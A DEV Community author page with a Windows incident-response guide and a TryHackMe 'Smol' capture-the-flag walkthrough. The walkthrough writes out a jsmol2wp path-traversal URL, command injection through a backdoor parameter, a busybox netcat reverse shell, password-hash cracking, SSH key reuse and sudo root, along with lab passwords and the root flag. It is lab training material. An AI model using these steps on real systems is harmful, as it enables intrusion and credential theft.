DEV Community: Cybrpunked

Windows Security Alert: Signs of a Hack & How to Remove Malware

Cybrpunked — Tue, 18 Mar 2025 18:08:02 +0000

I have always envisaged to myself- what happens when my device gets hacked when I’m working on Windows OS.
Or should I give it a thought that it’s already hacked and the attacker is just sittin’ on a cozy couch and sippin’ his/her coffee ☕ looking at me and my screen?
Hackers, huh?

Bonjour Peers!

Today, we are going to take a look on the topic that was mentioned in the title that got you into this page. I have myself encountered dubious activities that was happening in my windows environment. Let me spill what I experienced to you.

My Experience: I had my suspicion on my Windows for quite a long time, but I didn’t give it a thought as I was and is using Linux most of the time. I didn’t open windows at all for a while. However, each and every time I open my Windows, there would be some kind of a script that runs for a second within a flash — and this got me swirling my mind like a driller into the thin wall, as this in every perspective is unusual for any system.

Windows OS have a market share of 73% on a global scale- according to the report of 2024. The same report till February 2025, has experienced a down turn, and has a share of 68% of users to it.
Hence, knowing how to act immediately when a hack is carried out is extremely essential for the users of their own devices in use.

Then I did a few methods to clean up.

Let’s now get down to business. 👔💼

Step-by-Step Guide to Contain, Investigate & Isolate the System:

🚨 Immediate Action (Containment):

1) Disconnect System from Internet

Plug out the Ethernet cable or try to disconnect the Wi-Fi on the system. This will be the first thing that you need to do once you are damn suspicious.

2) Quarantine the Affected Machine

If the computer is live on a network, you must disconnect it from that network before the attacker does lateral movement.

3) Change the Passwords on a Different Device
DO NOT change any passwords on the compromised machine. Use another separate machine to change the credentials for:

i) Windows login (applies only if its in an Active Directory) from the domain controller with proper authority access and not from your compromised machine.

ii) Online Accounts like banking, emails, social media, etc.

iii) Administrator accounts

4) Check for Unknown Usernames & Sessions
Open Task Manager by pressing Ctrl + Shift + Esc (or) Right-clicking on the Windows button on your taskbar, and click ‘Task Manager,’ and see if unknown users are logged in (attackers use a different name most of the time).

5) Using Cmd Prompt to see Local Users (Applicable for Active Directory Environment)
Click on search tab from Desktop page and type “cmd”. Right click on the command prompt, then select ‘Run as administrator’ and open it.
Then type:

net user

which will list ALL the local users. If you see an unknown user, then the system is compromised.

End Malicious Tasks Open Task Manager by pressing Ctrl + Shift + Esc → Process Tab. (or) Right click on the Windows icon from taskbar and click ‘Task Manager’ which will open it.

Look for suspicious processes (high CPU usage, unfamiliar names).

→ Right-click → End Task (if you suspect it’s malicious).

🔦 Investigation & Evidence

7. Check Recent Logins
Run the below command in Terminal as an Administrator:

net user <USERNAME>

Replace with the actual user account name to check the last login time.

Open Event Viewer:
→ Press Win + R, type eventvwr.msc, and press Enter.

→ Navigate to Windows Logs → Security.

→ Look for Event IDs: 4624 (Successful Login) and 4625 (Failed Login Attempts).

8. Check Network Connections for Backdoors
Open the Command prompt as Administrator and run the below command:

netstat -ano

→ This will show you the active connections.
→ Look for suspicious IP addresses- essentially the foreign ones for unusual process maintaining active connections.

Killing the Process:
If you come to encounter, enter the below command:

taskkill /PID <PID> /F

Replace the ‘’ with the Process ID. For example,

taskkill /PID 1427 /F

Block the Malicious IP in Windows Firewall:
Enter the below command to block the IP in firewall,


netsh advfirewall firewall add rule name="Block Backdoor IP" dir=out action=block remoteip=<IP>

9. Scan for Malware & Rootkits
Using the In-built Windows Defender:
Open Windows Security → Virus & Threat Protection → Quick Scan.

Using Third Party Anti-Malware Software to use:
Use legit software like:

i) Malwarebytes

ii) ClamWin

iii) Kaspersky

iv) Hitman Pro

10. Look for New Startup Programs & Services

→ Open Task Manager → Startup Tab
Disable unknown or suspicious program

→ Open Run (Win + R) Type ‘services.msc’ .
Look for newly running or newly installed services running in the background.

11. Check for Newly Installed Programs & Drivers
→ Open Control Panel → Programs & Features.
→ Look for recently installed or unknown software.

🛠️ Recovery & Remediation

Remove the Threat
→ Uninstall malicious software from Control Panel.

→ Use Autoruns (Sysinternals) to disable persistent malware.

Restore System to a Safe State
→ If backups exist, restore to a previous state via System Restore.

→ If files are encrypted (ransomware attack), use a clean backup.

Reinstall Windows (If Necessary)

If the infection is deep (rootkit, ransomware), perform a full Windows reset:

→ Settings → Update & Security → Recovery → Reset this PC.

→ Choose “Remove Everything” for a clean installation.

🔒 Strengthening Security

1. Enable Multi-Factor Authentication (MFA)

→ Activate MFA on all important accounts (email, banking, cloud).

2. Update Windows & Software

→ Ensure Windows Updates and antivirus definitions are up to date.

3. Use a Firewall & Secure Network

→ Enable Windows Defender Firewall or use a reputable third-party firewall.

4. Monitor for Further Threats

→ Set up Windows Security Alerts and regularly check logs.

🛑 If You Suspect a Serious Breach:

→ Contact a cybersecurity professional or incident response team.
→ If sensitive data was stolen, notify authorities (if applicable).

🏁 Conclusion: Take Back Control — Secure Your Windows PC Now!

If your Windows PC has been hacked, time is of the essence. Cybercriminals can steal your data, track your activities, or even use your device for malicious purposes. But here’s the good news — you can eliminate threats and secure your system fast with the right approach.

By detecting suspicious activity, removing malware, and closing security gaps, you can restore control and protect your personal information. However, cybersecurity isn’t just about fixing a hack — it’s about preventing one.

To keep your Windows PC safe from hackers, always:
✅ Keep your system and software updated
✅ Use strong, unique passwords with multi-factor authentication
✅ Run regular malware scans and monitor network activity
✅ Enable a firewall and limit unnecessary remote access

By staying proactive, you can turn your Windows PC into a cyber-fortress — one that hackers won’t stand a chance against. Stay safe, stay updated, and stay one step ahead of cyber threats! 🔒💻

🗨️ Comment your thoughts below!

TryHackMe Smol Walkthrough: Step-by-Step Guide to Exploitation & Privilege Escalation

Cybrpunked — Fri, 14 Mar 2025 19:07:12 +0000

Bonjour Hunters! ▄︻デ══━一💥

They say size doesn’t matter — and the Smol machine on TryHackMe proves just that! Don’t let the name fool you; this box packs a punch with tricky exploits, enumeration & privilege escalation techniques.

In this write-up, I’ll walk you through the full hacking process, from enumeration to root access, while sharing insights along the way.

Let’s dive in and pwn Smol like a pro! 🚀

To access the web page, we have to add the IP address to /etc/hosts

echo "<ip>  www.smol.thm" >> /etc/hosts

Then we visit the web page of the IP, in which we will be taken to this page below👇:

The first thing that we do here is to look for source code of the web page. But nothing unusual in there.

Then I tried ffuf & nmap for Subdomain fuzzing & port scanning respectively but nothing unusual there too.

💡 Then my brain gave me a kick on what to do next…

As the page uses WordPress, lets just simply try enumerating it with WPScan tool.

🔎If you have no idea about WPScan and want to know about & use it, kindly read this- Learn about WPScan Command Line Usage to understand about WordPress Vulns

Slack the keyboard with the following cmd:

wpscan --url www.smol.thm --enumerate ap,t,u

ap — all plugin enumeration
t — looks for outdated themes for vulns
u — identifies users of that page

After the scanning is done, we should analyze the scanned output it gives.

𖥠 While looking through it, one name among the plugins caught my eye!

I was suspicious about our little guy- jsmol2wp. So I looked through the internet and YES it is vulnerable!

And wow! We have also gathered info about the users!
Save all these info in a file.

As we can see that the plugin is vulnerable, first lets try to crack into it with the help of few research through google.

After few minutes⏱️ of research, I came across this GitHub page:
https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt
in which we can see a clue under the POC side heading.
To clarify, lets try it…

http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php
?isform=true
&call=getRawDataFromDatabase
&query=php://filter/resource=../../../../wp-config.php

Got it!
We got something going on in this page…

When looked through it, we are able to see the Username and Password of a database. Great!

Let’s navigate to the web page: http://www.smol.thm/wp-admin
So that we can login with the creds we got.

✅We are logged in.

Now, its time for us to roam around and see what we find.

When looking around the page- section-by-section, we are able to find Pages in it. Under that section, we are able to see this:

The author here is ‘admin’, and when clicked into ‘Webmaster Tasks!!’ we are seeing this:

It says we should check the code of “Holly Dolly” plugin. I looked for github pages for clues, and I found out that the Holly Dolly will have a source code page in the name of ‘hello.php’

It looks like, any plugin will be having a url that’s similar to:

/wp-content/plugins/jsmol2wp/php/jsmol.php

After several tries that failed, I managed to crack the hidden page.
Hence, let’s modify our url to the following 👇:

http://smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php
?isform=true
&call=getRawDataFromDatabase
&query=php://filter/resource=../../../../wp-content/plugins/hello.py

And yes, we caught the page in our hands!

When scrolling through the page, there’s a hash value that we are able to see:

Let’s open Cyberchef and see what we find.

When pasted the hash value into the input and click the magic wand near the output, we get:

This is an indication there’s a flaw in the web page.
An indication that states to use ‘cmd’ inside “$_GET” , as of

$_GET["cmd"]

Aight!

Try to change the Url of the link to

http://www.smol.thm/wp-admin/edit.php?cmd=whoami

You’ll get the output on the page as this

Well well well gang!

Let’s teach this machine to talk back 😉

Head to revshells.com and look for ‘busybox nc -e’ and click on it.

Start up the listener in your terminal-

nc -lvnp 9001

Now, copy the reverse shell-

busybox nc <ip> 9001 -e sh

and paste it into the link and click enter to get our callback 📞.

https://www.smol.thm/wp-admin/edit.php?cmd=busybox nc <ip> 9001 -e sh

🔑 Shell secured — time to explore the loot!

Stabilizing the shell first:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo;fg

So, what do we have in here…

Looking around as a visitor. Nothing encountered.

But my brain did. I got remembered about the SQL database that we saw in a PHP page. Lets try.

mysql -u wpuser -p

Enter the password we used to login for the user:
kbLSF2Vop#lw3rjDZ629*Z%G

Bam, it worked!

Then to view the databases-

show databases;

we are looking for ‘wordpress’ passwords, lets go for it.

use wordpress;
show tables;

This will display the tables in wordpress database.
Here we are looking for user’s passwords so:
‘wp_users’ suits well.

select * from wp_users;

🔐Well here, we have all the password hashes. Copy and save ALL of ’em hashes into a hash.txt file.

Lets try de-hashing it with the help of The Ripper.

john hash.txt --format=phpass --wordlist=/usr/share/wordlists/rockyou.txt

The phpass format is a Portable PHP Password Hashing Framework used in WordPress.

After a while of waiting my poor core usage at its fullest:

We’ll be getting the de-hashed value:

Now when we look at the users where we found before in the process of using WPScan:

By seeing we are able to guess that the password: sandiegocalifornia belongs to the user: diego

1337! We’re in as diego.

Its essential to note that- the privilege escalation that we’re doing here is in a Horizontal level Privilege Escalation
After cd-ing into diego from /home

WE GOT OUR FIRST FLAG! 🚩

Hotsy-totsy!

Now, we are also able to get into
/home/gege &
/home/think from diego.

cd /home/gege
ls -la

We are able to see the ‘wordpress.old.zip’ file. But when we try to unzip it, we aren’t able to really do it as it is owned by root.

We will see what’s available in /home/think

cd /home/think
ls -la

Good, we’re seeing something off the board here:

cd .ssh
ls -la

cat id_rsa

Great, a private key!!
Now, lets get into the think account completely.

ssh think@www.smol.thm -i id_rsa

By doing this we get into the user of think.

When we now get into

cd /home/gege
ls -la

We can witness that the file is still owned by the root

Aight! Now we shall do

su gege

and start a server for us to download it into our machine and extract the password using zip2john.

python3 -m http.server 8080

and when you navigate to the browser(http://ip:8080), you would see

click on it to download.

Once it is downloaded, head to the path of the downloaded file and get into the terminal from there.
Then clack the below cmd

zip2john wordpress.old.zip > wphash

It would be quick in it and a file of the name wphash would be created. the cat version of the file would look like this:

Now. Let’s run The Ripper

john wphash -w=/usr/share/wordlists/rockyou.txt

DARN IT!

That was quick!

Now getting back to the reverse shell terminal and trying to unzip the file

And

cd wordpress.old

LOOK!

Our Finest DANGEROUS file!

And when we cat it:

<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/documentation/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'xavi' );

/** Database password */
define( 'DB_PASSWORD', 'P@ssw0rdxavi@' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'put your unique phrase here' );
define( 'SECURE_AUTH_KEY',  'put your unique phrase here' );
define( 'LOGGED_IN_KEY',    'put your unique phrase here' );
define( 'NONCE_KEY',        'put your unique phrase here' );
define( 'AUTH_SALT',        'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT',   'put your unique phrase here' );
define( 'NONCE_SALT',       'put your unique phrase here' );

/**#@-*/

We got Xavi user’s Password too!!

su xavi

After getting into the xavi account with the help of the password obtained:
P@ssw0rdxavi@

Lets see the permissions for xavi:

💰Root-access AMAZING!

Type the below command to get into bash shell of xavi to become #ROOT.

sudo sudo /bin/sh

Then when we do the following

▄︻╦芫≡══ — HACKSTATIC!

ROOT FLAG CAPTURED:
bf89ea3ea01992353aef1f576214d4e4

🔍 Wrapping Up: Small Box, Big Lessons

The Smol machine might be tiny in name, but it packs a punch 💥 in teaching fundamental enumeration, privilege escalation, and shell exploitation techniques. This challenge reinforces the golden rule of penetration testing—never underestimate the "small" details 🧐, as they often hold the key 🔑 to unlocking the entire system.

Whether you're a beginner sharpening your recon skills 🛠️ or a seasoned hacker looking for a quick thrill 🎯, Smol proves that size doesn’t always matter—methodology does.

Until next time, keep hacking, keep learning 🧑‍💻, and remember: even the smallest misconfigurations can lead to the biggest vulnerabilities. ⚠️

Follow me on Medium for more contents related to Cybesecurity!